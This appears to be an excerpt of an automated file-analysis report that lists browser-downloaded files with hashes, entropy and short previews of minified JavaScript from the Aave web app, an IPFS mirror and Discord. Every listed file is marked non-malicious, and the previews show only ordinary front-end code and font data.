                                                                                                                                                                                                                                                  SHA-512:CF9F8F05EB83B65F9381E34356A993EC3205C427BCE133369A858D792ED1BFA269BB380E6A09081A0E6F23196AA32BCA49AB1DE3A3254A068163D062F0847942
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1497],{94671:function(e,t,n){n.d(t,{NI:function(){return r},gK:function(){return s},pQ:function(){return o},Fi:function(){return i},iv:function(){return c},Vc:function(){return l},yI:function(){return p}});var r,a=n(70794),u=n(29946);!function(e){e[e.SUPPLY_CAP_REACHED=0]="SUPPLY_CAP_REACHED",e[e.NOT_ENOUGH_COLLATERAL_TO_REPAY_WITH=1]="NOT_ENOUGH_COLLATERAL_TO_REPAY_WITH",e[e.ZERO_LTV_WITHDRAW_BLOCKED=2]="ZERO_LTV_WITHDRAW_BLOCKED",e[e.FLASH_LOAN_NOT_AVAILABLE=3]="FLASH_LOAN_NOT_AVAILABLE"}(r||(r={}));var s=function(e,t){return"-1"!==e&&new a.O(e).minus(new a.O(t)).lt("1.05")},o=65e3,i=55e3,c=function(e){var t=e.approvedAmount,n=e.signedAmount,r=e.amount;return!("-1"===t||"-1"===n||"0"!==t&&Number(t)>=Number(r)||Number(n)>=Number(r))},l=function(e){var t=[];return e.userReservesData.forEach((function(e){Number(e.scaledATokenBalance)>0&&"0"===e.reserve.baseLTVasCollateral&&e.usageAsCollateralEnabledOnUser&&"0"!==e.res
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30017), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):30017
                                                                                                                                                                                                                                                  Entropy (8bit):5.548100928269389
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:eyPkWVecfOr8Wm4ehCs1FMumm2l51Rbe25inho:zeTrfehCLue3E2V
                                                                                                                                                                                                                                                  MD5:64D0012F057AD174CE09BEE086DCABCB
                                                                                                                                                                                                                                                  SHA1:541B4D683C2FF0E97DC44CB610D3363C2D6C9AC1
                                                                                                                                                                                                                                                  SHA-256:FD84BE519CEBD2F56A988E4977B905330A63D837A75587465F974A170AA15B57
                                                                                                                                                                                                                                                  SHA-512:5F54E67E35576CA905B2709E61D6FA13622B9311122EE8869493CE1F4C8CF39E171CB053CCF221FC879C60112E5775D4F9C404C9CBE0FAE7D92A5D824FEE836C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/425.092c8e24fce5a024.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[425],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25017), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25017
                                                                                                                                                                                                                                                  Entropy (8bit):5.490324489362877
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:60xIvm0TehCsSkty1KpMpsmp7KAQP6fBUxca0cnYB66q6ys1Hb/kb/e:9x2maehCsbtyEcsm7ZBfBUx9lnAvbkbe
                                                                                                                                                                                                                                                  MD5:CE587F0255C77D4E85AE8D6C8E4AEFB1
                                                                                                                                                                                                                                                  SHA1:804E5A006C97DD1D04B16FD2B83A160C8B5E75AC
                                                                                                                                                                                                                                                  SHA-256:E60CE58E41446D0055D0D566697B054FD9C3263DFC198C736DBC4B5C8773140F
                                                                                                                                                                                                                                                  SHA-512:F0EA0ED586B990B69781D238B33C7EE048C8F0E3CE9F6A6E6572FC7B30B90AB724BC5B71D69E800320BE541D5F96DE6D4698B77D37E7FC1F57056A37C47204AB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7211],{1252:function(e,t,r){r.d(t,{O:function(){return s}});var n=r(49501),a=r(85893),s=function(){return(0,a.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing support, it is not possible to perform a collateral switch where stETH is the source token."})}},81902:function(e,t,r){var n;r.d(t,{R:function(){return n}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(n||(n={}))},25049:function(e,t,r){r.d(t,{Y:function(){return d}});var n=r(59499),a=r(4730),s=r(49501),o=r(81902),i=r(58527),l=r(85893),c=["capType"];function u(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function p(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?u(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.ge
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32296), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32296
                                                                                                                                                                                                                                                  Entropy (8bit):5.550842940232815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:CyPQpv2tTvUpTwuWVecfO4ti1GxYdx1puDe7Ne9ESPtQ5kcOCFlFPB:I+c0FeTCGOtQaM
                                                                                                                                                                                                                                                  MD5:206FCD11C80531EFFF8F2F0AE620819B
                                                                                                                                                                                                                                                  SHA1:F94505BDD8F4B2BAEFFE73EF659A50DCFBA1398A
                                                                                                                                                                                                                                                  SHA-256:0C11EF67255006BCCBE420902EB81957506A452FA5FB039D527FB07E3A49D0AE
                                                                                                                                                                                                                                                  SHA-512:20684F4292AC134B3337DF04D0B11C680FBF9EE3EEB45DC0136B73CA5E80169971C00DC25DE6DC797286499E445D45DEE8BE4DA231ED3D4D060FDA0B162874F9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1066],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},75158:function(e,n,t){t.d(n,{Z:function(){return Z}});var r=t(63366),o=t(87462),i=t(67294),a=t(86010),s=t(94780),c=t(41796),l=t(37743),d=t(54235),u=t(85893),x=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13036), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13036
                                                                                                                                                                                                                                                  Entropy (8bit):5.471579637442991
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:dFIHqT0a1tfd9zBBqgO9cbCNdV8DjIWUlczhbCu:dDTv1P9zigOeov8RbCu
                                                                                                                                                                                                                                                  MD5:537C1A15CF24097C4DC8F54C8F467F1B
                                                                                                                                                                                                                                                  SHA1:0A00875515D03B65DCA77210EB0EF822A6133684
                                                                                                                                                                                                                                                  SHA-256:6C386CC711BA1B3FE2360F6E6475A7CECD2AE5D8C1C45FC617582D6046193691
                                                                                                                                                                                                                                                  SHA-512:3990E739DF5D509194AD4D04C410395668A324FCF9EDEEDED547F780B718FDCD231A255B38F77DE7B1DFD90449F76ABE58342EFD90B84A49BF8D10ED8ED6F159
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),a=r(30120),s=r(29630),c=(r(67294),r(73965)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"];function u(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function x(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?u(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):u(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}n.Z=function(e){var n=e.minVal,r=e.maxVal,t=e.percentVariant,u=e.hyphenVariant,h=(0,o.Z)(e,p),f=(0,c.HT)(),m=f.ghoLoadingData,j=f.ghoReserveData;if(m)return(0,d.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29762), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29762
                                                                                                                                                                                                                                                  Entropy (8bit):5.546603560650734
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:zyPkWVecfOFulmjehCsF9vb6C8Sel+dCjuvho:aeTF5ehCu8QC3
                                                                                                                                                                                                                                                  MD5:F906CF385CDEB9914B7895D6C0A8323E
                                                                                                                                                                                                                                                  SHA1:52D0B3EC9CFB5E018BBC3071042EE07C1E705647
                                                                                                                                                                                                                                                  SHA-256:021E92EEC50B6BB51C5AA3C87914BD5F95CC92303801A2CADCD73F8113A8FEC9
                                                                                                                                                                                                                                                  SHA-512:4B9ED7788AF2EBDA07E0A0F800D85173FF7CE6B3DAB42A97F43F70D793D8E961D6289D7C11778F53473314B60EE74F0601813A4676B987B51CE4939DC572C160
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/501.32a1d2d2411733f6.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[501],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 106108, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):106108
                                                                                                                                                                                                                                                  Entropy (8bit):7.997330968548761
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:nLj6taUgda0xgEkzkFDcgwkUWTCUSj03LX8SbGeLDy1FAk1l+3WhLU+EMDPTGCaT:vUgkGgbS91UWTFSjpStLDy1FX1+Q1/B8
                                                                                                                                                                                                                                                  MD5:37DA9EECF61EBCED804B266B14EEF98E
                                                                                                                                                                                                                                                  SHA1:72F6E4D5124D09735DA3CB97BA05F126C5651997
                                                                                                                                                                                                                                                  SHA-256:307D980962214FFA01B106339EDCB5D2E6EF3A9607B9B815BB7287D2C735C68F
                                                                                                                                                                                                                                                  SHA-512:143601646B472E5309CEC049CF7FB00AD93BDD3812DF9E11A71C5806C2D086E2454C341A61447016BA240D9F6523E112B20678A439C442A6EFAF817DD5CCBCBC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-ExtraBold.d65f0281.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......|..........................................r...J.`..........e..T..6.$..N. ..,...-[73..J..$gc.e....A(h....!&.J..U.%.L...C.0.{Ns.....!*!AP.j....Z^W.m.m..-................{Y.#...?..O....E......x.*.........*Y....sI...d.J.b'c...<....6=....8...Fb. D...ai...E$.4..3..9.@..." uU%.D+..u.. .hV...k....$....*...|.C...5-h1.S:=.....S8cK.........t1.#...!.'..Hl......t, .5..............AOU.cVa...J...@....Xw,.B. ....3..5y..dY.....".|)n.:.....o..UwF...*.8..W.X;a.B.VZR.o.^.a0..M..<.3.=..,.3...A....#......XO..D..w.0z..R.Tj.JH..~..4..t>2..!n..`:4....S.?....y.~..&...^...{e.{..4.F.D&.....-...@.EP&E...$.......yE.......".-|......w...C..G..EpLa..).@JT.h.Iw...Rx..1.6^&.H.S...Y..5.RB.?........bL..qA...Ud]r........P...jb.i..+..wk_..Y.O...E..>..)..{...t...pJ..../.....T.../.3.az..S........E..,./.....eE.x....*." B...l.6....4...C..1...4.E8.%r..r.%..TJ;9..T|IH../.........3......Q0...Y...V..-. l.......T.J..:\..sE>}/b...y...'.d..y..9.?u..H.].Z.CD.)......U....l
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):377002
                                                                                                                                                                                                                                                  Entropy (8bit):5.50606385450746
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:qREQG4HoBhbzI8EPQwcuL3svu9phE3x5iHB4LRQCPT6pCxkLNKT4D2nZaHppoBGA:qI4chbzIvcd64LRQCPGekMTg2oHjj3p2
                                                                                                                                                                                                                                                  MD5:95729618476C5EBE1D8A4162BBF8EC53
                                                                                                                                                                                                                                                  SHA1:C63D508F9F2042DD9E05E86DCEC0CA5BA471CDAA
                                                                                                                                                                                                                                                  SHA-256:0E40B5B679B7D8A82F97B931263AC24095073C75ED1683637288B8F52C9B75C5
                                                                                                                                                                                                                                                  SHA-512:DBD1D45EFF279FFF17BE3C0231704FBF6A21832BA547C300B063638B0629F4B97F2EA3B45A06337F5E7F6CCA8B6515A2E98A4782489B3B048AEFE9AA2912DC13
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4700],{56674:function(e,t,r){"use strict";r.d(t,{J:function(){return w},c:function(){return A}});let n=!1,i=!1;const o={debug:1,default:2,info:2,warning:3,error:4,off:5};let s=o.default,a=null;const u=function(){try{const e=[];if(["NFD","NFC","NFKD","NFKC"].forEach((t=>{try{if("test"!=="test".normalize(t))throw new Error("bad normalize")}catch(r){e.push(t)}})),e.length)throw new Error("missing "+e.join(", "));if(String.fromCharCode(233).normalize("NFD")!==String.fromCharCode(101,769))throw new Error("broken implementation")}catch(e){return e.message}return null}();var c,l;!function(e){e.DEBUG="DEBUG",e.INFO="INFO",e.WARNING="WARNING",e.ERROR="ERROR",e.OFF="OFF"}(c||(c={})),function(e){e.UNKNOWN_ERROR="UNKNOWN_ERROR",e.NOT_IMPLEMENTED="NOT_IMPLEMENTED",e.UNSUPPORTED_OPERATION="UNSUPPORTED_OPERATION",e.NETWORK_ERROR="NETWORK_ERROR",e.SERVER_ERROR="SERVER_ERROR",e.TIMEOUT="TIMEOUT",e.BUFFER_OVERRUN="BUFFER_OVERRUN",e.NUMERIC_FAULT="
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):135526
                                                                                                                                                                                                                                                  Entropy (8bit):5.3741924520452145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:Qor/gvCRzpAUDZxnwdKPHOWaCHMRGyfpQ1WSK2mg335x+Jk9rLkSYRDeB/P30MSF:t/gvCvbwoOWaCHMLRWkRjMeA2
                                                                                                                                                                                                                                                  MD5:C6375E6BEF51D42031BFC33337AAF902
                                                                                                                                                                                                                                                  SHA1:BBC5DD641026C865B9EC5EA5DE60B937E8E11F78
                                                                                                                                                                                                                                                  SHA-256:7767BE997BDEA366C3C547D068A0D911530839362AC09A4D95EEEEAB62A05EA7
                                                                                                                                                                                                                                                  SHA-512:262EEE415E939C2ACB0269ECC146E92A723B398F3E19A2880D8E564EFF91B081E7DA1BD746358B97F95D4B76F1CEF21B81D6313F208715A3DD454E92D1083F3C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.loaded=!0,r.exports}return i.m=e,i.c=t,i.p="",i(0)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(1),r=i(3),n=i(8),a=i(15);function o(e,t,i){var a=null,o=function(e,t){i&&i(e,t),a&&a.visit(e,t)},u="function"===typeof i?o:null,h=!1;if(t){h="boolean"===typeof t.comment&&t.comment;var c="boolean"===typeof t.attachComment&&t.attachComment;(h||c)&&((a=new s.CommentHandler).attach=c,t.comment=!0,u=o)}var l,p=!1;t&&"string"===typeof t.sourceType&&(p="module"===t.sourceType),l=t&&"boolean"===typeof t.jsx&&t.jsx?new r.JSXParser(e,t,u):new n.Parser(e,t,u);var d=p?l.parseModule():l.parseScript();return h&&a&&(d.comments=a.comments),l.config.tokens&&(d.tokens=l.tokens),l.config.tolerant&&(d.errors=l.errorHan
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11144), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11144
                                                                                                                                                                                                                                                  Entropy (8bit):5.459163683582332
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w0yPmy/Qn+aK/K20ove4TvGerF7jC/LkXg8FY/42QKI6f8b0tEbnU8pnL/jwogTt:vyPmy/Qn+3/Zpve4TvP1jEkXG/QHYWf4
                                                                                                                                                                                                                                                  MD5:B2CDA9B304B1CD4AA899F1774A4137D2
                                                                                                                                                                                                                                                  SHA1:572F9DC2234762E51A76A941A7DB1B07785D5D74
                                                                                                                                                                                                                                                  SHA-256:43D43EC5CFA4092A88CA2A78E56A0D6E8020315A5693F03BB9746635EE9F1FAA
                                                                                                                                                                                                                                                  SHA-512:B14FDDA0FC2234C18DF97BB31724C92CF34BAB63BAD846CB584399D9E1CBAD5062D79386FA353CCDE471703A7E2F6D31F833BEA1C40D545F543CE121CC6D4522
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9410],{62753:function(e,t,n){var o=n(64836);t.Z=void 0;var r=o(n(64938)),i=n(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},62278:function(e,t,n){var o=n(54235),r=n(85893);t.Z=(0,o.Z)((0,r.jsx)("path",{d:"M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z"}),"ContentCopyOutlined")},39702:function(e,t,n){var o=n(54235),r=n(85893);t.Z=(0,o.Z)((0,r.jsx)("path",{d:"M5 20h14v-2H5v2zM19 9h-4V3H9v6H5l7 7 7-7z"}),"Download")},75158:function(e,t,n){n.d(t,{Z:function(){retur
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29637), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29637
                                                                                                                                                                                                                                                  Entropy (8bit):5.565821903446819
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:qyP66F6xI8VecZU+tJI7OzrgtRtAabGlhFvFUfb2Vz/JGbk:iD3eD+DIazwfG
                                                                                                                                                                                                                                                  MD5:7CFB0663518DEFE6ECDAE056D58A67FC
                                                                                                                                                                                                                                                  SHA1:9317D9C28765D914C9D314B523A9D1CC64D242C2
                                                                                                                                                                                                                                                  SHA-256:48ED860A4168C30C71947E753682BFDD30E2B84D1A22AC237D9F617E9EB6A217
                                                                                                                                                                                                                                                  SHA-512:7904510661D3977BB4DBBBE0A74DC56C2CA09CC5C52DE74D74804AA01B05A9947F04B67B1F0BAFD571514F053CA498F96A57D61FF2AC08C03BFCE253A43CE634
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8882,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","cl
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7029)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7078
                                                                                                                                                                                                                                                  Entropy (8bit):5.693672087902241
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:EDHGzBioMyirXyf70li//fZc8Twtv1T5aLdMu951f54aH8L:EDmlioLirXyfYlw/xHWOyuB+acL
                                                                                                                                                                                                                                                  MD5:45A3EE5FF96BDB2DD7FBB2846B5EA494
                                                                                                                                                                                                                                                  SHA1:795E2BB4E00AB75A91BDBA9A4C7D9E2B2E0CD905
                                                                                                                                                                                                                                                  SHA-256:08F280458FAB95C2E5754187C406458A8FE69A1C12329C8EF6CB801067E00BB6
                                                                                                                                                                                                                                                  SHA-512:D545E8F9FE857A5A3AC908E1CCDA13ADCD19EFA78AE34143BCB36080C228090B8C5AE446EFE51C4A87A22BD9403B6E851219B331274D8929EB20AF81E9B159F8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43222"],{340618:function(r,t,o){var e=o(354848),n=String,c=TypeError;r.exports=function(r){if("object"==typeof r||e(r))return r;throw c("Can't set "+n(r)+" as a prototype")}},442975:function(r,t,o){var e=o(936940);r.exports=!e(function(){function r(){}return r.prototype.constructor=null,Object.getPrototypeOf(new r)!==r.prototype})},33995:function(r){r.exports={IndexSizeError:{s:"INDEX_SIZE_ERR",c:1,m:1},DOMStringSizeError:{s:"DOMSTRING_SIZE_ERR",c:2,m:0},HierarchyRequestError:{s:"HIERARCHY_REQUEST_ERR",c:3,m:1},WrongDocumentError:{s:"WRONG_DOCUMENT_ERR",c:4,m:1},InvalidCharacterError:{s:"INVALID_CHARACTER_ERR",c:5,m:1},NoDataAllowedError:{s:"NO_DATA_ALLOWED_ERR",c:6,m:0},NoModificationAllowedError:{s:"NO_MODIFICATION_ALLOWED_ERR",c:7,m:1},NotFoundError:{s:"NOT_FOUND_ERR",c:8,m:1},NotSupportedError:{s:"NOT_SUPPORTED_ERR",c:9,m:1},InUseAttributeError:{s:"INUSE_ATTRIBUTE_ERR",c:10,m:1},InvalidStateError:{
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9645), with no line terminators
